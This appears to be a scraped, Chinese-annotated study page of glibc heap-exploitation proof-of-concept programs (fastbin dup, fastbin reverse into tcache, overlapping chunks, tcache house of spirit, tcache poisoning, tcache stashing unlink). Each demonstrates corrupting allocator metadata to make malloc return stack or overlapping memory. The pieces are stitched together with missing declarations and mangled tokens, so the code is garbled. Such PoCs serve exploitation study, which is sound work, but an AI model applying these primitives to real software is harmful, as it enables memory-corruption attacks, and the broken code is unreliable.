printf("Now, we can free %p again, since it's not the head of the free list.\n", a) ; free(a);
printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p tw ice!\n", a, b, a, a); a = calloc(1, 8); b = calloc(1, 8); c = calloc(1, 8); printf("1st calloc(1, 8): %p\n", a); printf("2nd calloc(1, 8): %p\n", b); printf("3rd calloc(1, 8): %p\n", c);
assert(a == c); }
调试
(之后行数为断点位置)
20 行,将 tcachebin 填满
29 行,calloc 三个 chunk,地址后三位分别是 3a0、3c0、3e0,由于这里是使用 calloc 创建的,所以不会分配 tcache bin 中的堆块
printf( "\n" "This attack is intended to have a similar effect to the unsorted_bin_attack,\n" "except it works with a small allocation size (allocsize <= 0x78).\n" "The goal is to set things up so that a call to malloc(allocsize) will write\n" "a large unsigned value to the stack.\n\n" );
// Allocate 14 times so that we can free later. char* ptrs[14]; size_t i; for (i = 0; i < 14; i++) { ptrs[i] = malloc(allocsize); }
printf( "First we need to free(allocsize) at least 7 times to fill the tcache.\n" "(More than 7 times works fine too.)\n\n" );
// Fill the tcache. for (i = 0; i < 7; i++) { free(ptrs[i]); }
char* victim = ptrs[7]; printf( "The next pointer that we free is the chunk that we're going to corrupt: %p\n" "It doesn't matter if we corrupt it now or later. Because the tcache is\n" "already full, it will go in the fastbin.\n\n", victim ); free(victim);
printf( "Next we need to free between 1 and 6 more pointers. These will also go\n" "in the fastbin. If the stack address that we want to overwrite is not zero\n" "then we need to free exactly 6 more pointers, otherwise the attack will\n" "cause a segmentation fault. But if the value on the stack is zero then\n" "a single free is sufficient.\n\n" );
// Fill the fastbin. for (i = 8; i < 14; i++) { free(ptrs[i]); }
// Create an array on the stack and initialize it with garbage. size_t stack_var[6]; memset(stack_var, 0xcd, sizeof(stack_var));
printf( "The stack address that we intend to target: %p\n" "It's current value is %p\n", &stack_var[2], (char*)stack_var[2] );
printf( "Now we use a vulnerability such as a buffer overflow or a use-after-free\n" "to overwrite the next pointer at address %p\n\n", victim );
//------------VULNERABILITY-----------
// Overwrite linked list pointer in victim. *(size_t**)victim = &stack_var[0];
//------------------------------------
printf( "The next step is to malloc(allocsize) 7 times to empty the tcache.\n\n" );
// Empty tcache. for (i = 0; i < 7; i++) { ptrs[i] = malloc(allocsize); }
printf( "Let's just print the contents of our array on the stack now,\n" "to show that it hasn't been modified yet.\n\n" );
for (i = 0; i < 6; i++) { printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]); }
printf( "\n" "The next allocation triggers the stack to be overwritten. The tcache\n" "is empty, but the fastbin isn't, so the next allocation comes from the\n" "fastbin. Also, 7 chunks from the fastbin are used to refill the tcache.\n" "Those 7 chunks are copied in reverse order into the tcache, so the stack\n" "address that we are targeting ends up being the first chunk in the tcache.\n" "It contains a pointer to the next chunk in the list, which is why a heap\n" "pointer is written to the stack.\n" "\n" "Earlier we said that the attack will also work if we free fewer than 6\n" "extra pointers to the fastbin, but only if the value on the stack is zero.\n" "That's because the value on the stack is treated as a next pointer in the\n" "linked list and it will trigger a crash if it isn't a valid pointer or null.\n" "\n" "The contents of our array on the stack now look like this:\n\n" );
malloc(allocsize);
for (i = 0; i < 6; i++) { printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]); }
char *q = malloc(allocsize); printf( "\n" "Finally, if we malloc one more time then we get the stack address back: %p\n", q );
/* A simple tale of overlapping chunk. This technique is taken from http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf */
long *p1,*p2,*p3,*p4; printf("\nThis is another simple chunks overlapping problem\n"); printf("The previous technique is killed by patch: https://sourceware.org/git/p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c\n" "which ensures the next chunk of an unsortedbin must have prev_inuse bit unset\n" "and the prev_size of it must match the unsortedbin's size\n" "This new poc uses the same primitive as the previous one. Theoretically speaking, they are the same powerful.\n\n");
printf("Let's start to allocate 4 chunks on the heap\n");
printf("Now let's simulate an overflow that can overwrite the size of the\nchunk freed p2.\n"); int evil_chunk_size = 0x581; int evil_region_size = 0x580 - 8; printf("We are going to set the size of chunk p2 to to %d, which gives us\na region size of %d\n", evil_chunk_size, evil_region_size);
/* VULNERABILITY */ *(p2-1) = evil_chunk_size; // we are overwriting the "size" field of chunk p2 /* VULNERABILITY */
printf("\nNow let's free the chunk p2\n"); free(p2); printf("The chunk p2 is now in the unsorted bin ready to serve possible\nnew malloc() of its size\n");
printf("\nNow let's allocate another chunk with a size equal to the data\n" "size of the chunk p2 injected size\n"); printf("This malloc will be served from the previously freed chunk that\n" "is parked in the unsorted bin which size has been modified by us\n"); p4 = malloc(evil_region_size);
printf("\np4 has been allocated at %p and ends at %p\n", (char *)p4, (char *)p4+evil_region_size); printf("p3 starts at %p and ends at %p\n", (char *)p3, (char *)p3+0x580-8); printf("p4 should overlap with p3, in this case p4 includes all p3.\n");
printf("\nNow everything copied inside chunk p4 can overwrites data on\nchunk p3," " and data written to chunk p3 can overwrite data\nstored in the p4 chunk.\n\n");
printf("Let's run through an example. Right now, we have:\n"); printf("p4 = %s\n", (char *)p4); printf("p3 = %s\n", (char *)p3);
printf("This file demonstrates the house of spirit attack on tcache.\n"); printf("It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n"); printf("You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n"); printf("(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");
printf("Ok. Let's start with the example!.\n\n");
printf("Calling malloc() once so that it sets up its memory.\n"); malloc(1);
printf("Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n"); unsignedlonglong *a; //pointer that will be overwritten unsignedlonglong fake_chunks[10]; //fake chunk region
printf("This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);
printf("This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n"); printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 w ill all be rounded to 0x40, so they would work for the malloc parameter at the end. \n"); fake_chunks[1] = 0x40; // this is the size
printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]); printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
a = &fake_chunks[2];
printf("Freeing the overwritten pointer.\n"); free(a);
printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]); void *b = malloc(0x30); printf("malloc(0x30): %p\n", b);
printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n" "returning a pointer to an arbitrary location (in this case, the stack).\n" "The attack is very similar to fastbin corruption attack.\n"); printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n" "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");
size_t stack_var; printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);
printf("Freeing the buffers...\n"); free(a); free(b);
printf("Now the tcache list has [ %p -> %p ].\n", b, a); printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n" "to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var); b[0] = (intptr_t)&stack_var; printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);
printf("1st malloc(128): %p\n", malloc(128)); printf("Now the tcache list has [ %p ].\n", &stack_var);
printf("This file demonstrates the stashing unlink attack on tcache.\n\n"); printf("This poc has been tested on both glibc-2.27, glibc-2.29 and glibc-2.31.\n\n"); printf("This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last no t least, we need a writable address to bypass check in glibc\n\n"); printf("The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n"); printf("This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack. \n\n");
// stack_var emulate the fake_chunk we want to alloc to printf("Stack_var emulates the fake chunk we want to alloc to.\n\n"); printf("First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");
stack_var[3] = (unsignedlong)(&stack_var[2]);
printf("You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]); printf("Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]); printf("Now we alloc 9 chunks with malloc.\n\n");
//now we malloc 9 chunks for(int i = 0;i < 9;i++){ chunk_lis[i] = (unsignedlong*)malloc(0x90); }
//put 7 chunks into tcache printf("Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to a nother will be merged into one after another malloc.\n\n");
for(int i = 3;i < 9;i++){ free(chunk_lis[i]); }
printf("As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");
//last tcache bin free(chunk_lis[1]); //now they are put into unsorted bin free(chunk_lis[0]); free(chunk_lis[2]);
//convert into small bin printf("Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");
malloc(0xa0);// size > 0x90
//now 5 tcache bins printf("Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");
malloc(0x90); malloc(0x90);
printf("Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);
//trigger the attack printf("Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk wer e linked into tcache bins.\n\n");
calloc(1,0x90);
printf("Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr : %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);
//malloc and return our fake chunk on stack target = malloc(0x90);
printf("As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
